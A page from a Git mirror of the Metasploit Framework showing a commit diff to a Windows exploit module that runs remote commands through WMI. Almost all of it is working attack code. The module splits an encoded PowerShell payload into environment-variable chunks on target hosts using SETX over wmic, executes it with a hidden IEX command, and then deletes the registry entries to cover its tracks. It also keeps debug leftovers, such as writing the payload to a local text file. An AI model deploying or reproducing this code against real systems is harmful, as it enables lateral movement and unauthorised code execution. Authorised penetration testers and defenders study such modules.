infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Nearly

bug/bundler_fix
Meatballs 2013-09-20 17:18:14 +01:00
parent a00f3d8b8e
commit 9819566d94
1 changed files with 105 additions and 28 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

133
modules/exploits/windows/local/wmis.rb
View File

@ -7,38 +7,44 @@
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
load '/mnt/hgfs/git/metasploit-framework/lib/msf/core/exploit/powershell.rb'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Post::Common
include Msf::Exploit::Powershell
def initialize(info={})
super( update_info( info,
'Name' => 'WMIS via Current User Token',
'Name' => 'Windows Management Instrumentation (WMI) Remote Command Execution',
'Description' => %q{
This module uploads an executable file to the victim system, creates
a share containing that executable, creates a remote service on each
target system using a UNC path to that file, and finally starts the
service(s).
This module executes powershell on the remote host using the current
user credentials or those supplied. Instead of using PSEXEC over TCP
port 445 we use the WMIC command to start a Remote Procedure Call on
TCP port 135 and an ephemeral port.
The result is similar to psexec but with the added benefit of using
the session's current authentication token instead of having to know
a password or hash.
We do not get feedback from the WMIC command so there are no
indicators of success or failure. The remote host must be configured
to allow remote Windows Management Instrumentation.
},
'License' => MSF_LICENSE,
'Author' => [
'Ben',
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
],
'References' => [
# same as for windows/smb/psexec
'References' =>
[
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
[ 'OSVDB', '3106'],
[ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ]
[ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'WfsDelay' => '15',
},
'DisclosureDate' => 'Jan 01 1999',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
@ -51,29 +57,100 @@ class Metasploit3 < Msf::Exploit::Local
))
register_options([
OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),
OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]),
OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]),
])
end
def exploit
begin
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
begin
print_status("#{server.ljust(16)} Creating service #{name}")
psh = cmd_psh_payload(payload.encoded).gsub("\r\n","")
#psh = "calc"
cmd = "cmd /c wmic /node:#{server} process call create \"#{psh}\""
vprint_status(cmd)
print_warning("Argsize #{cmd.length}") if cmd.length > 4000
ps = session.sys.process.execute(cmd[0..2000], cmd[2001..cmd.length-1], {'Hidden' => false, 'Channelized' => false})
Sleep(5)
ps.process.close
rescue
next
end
if datastore['SMBUser'] and datastore['SMBPass'].nil?
fail_with(Failure::BadConfig, "Need both username and password set.")
end
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
# Get the PSH Payload and split it into bitesize chunks
# 1024 appears to be the max value allowed in env vars
psh = cmd_psh_payload(payload.encoded).gsub("\r\n","")
psh = psh[psh.index("$si")..psh.length-1]
chunks = split_code(psh, 1024)
print_status("[#{server}] Storing payload in environment variables")
env_name = rand_text_alpha(rand(3)+3)
env_vars = []
0.upto(chunks.length-1) do |i|
env_vars << "#{env_name}#{i}"
c = "cmd /c SETX #{setx_user_pass_string}#{env_vars[i]} \"#{chunks[i]}\""
wmic_command(server, c)
end
exec_cmd = "powershell.exe -nop -w hidden -c $x = ''"
env_vars.each do |env|
exec_cmd << "+$env:#{env}"
end
exec_cmd << ";$x >> c:\\parp.txt;IEX $x;"
print_status("[#{server}] Executing payload")
sleep(10)
wmic_command(server, exec_cmd)
sleep(10)
print_status("[#{server}] Cleaning up environment variables")
env_vars.each do |env|
cleanup_cmd = "cmd /c REG delete HKCU\\Environment /V #{env} /f"
wmic_command(server, cleanup_cmd)
end
end
end
# If we are local administrator then environment variables are stored as
# SYSTEM in S-1-5-18 instead of the Administrator -500 HKCU store so we
# need to ensure we set the env vars for the current user!
def setx_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
userpass = ""
unless user.nil?
if domain.nil?
userpass = "/s 127.0.0.1 /u #{user} /p #{pass} "
else
userpass = "/s 127.0.0.1 /u #{domain}\\#{user} /p #{pass} "
end
end
return userpass
end
def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
userpass = ""
unless user.nil?
if domain.nil?
userpass = "/user:\"#{user}\" /password:\"#{pass}\" "
else
userpass = "/user:\"#{domain}\\#{user}\" /password:\"#{pass}\" "
end
end
return userpass
end
def wmic_command(server, cmd)
wcmd = "wmic #{wmic_user_pass_string}/node:#{server} process call create \"#{cmd.gsub('"','\\"')}\""
vprint_status("[#{server}] #{wcmd}")
# We dont use cmd_exec as WMIC cannot be Channelized
ps = session.sys.process.execute(wcmd, "", {'Hidden' => true, 'Channelized' => false})
end
def split_code(psh, chunk_size)
array = []
idx = 0
while (idx < psh.length)
array << psh[idx, chunk_size]
idx += chunk_size
end
return array
end
end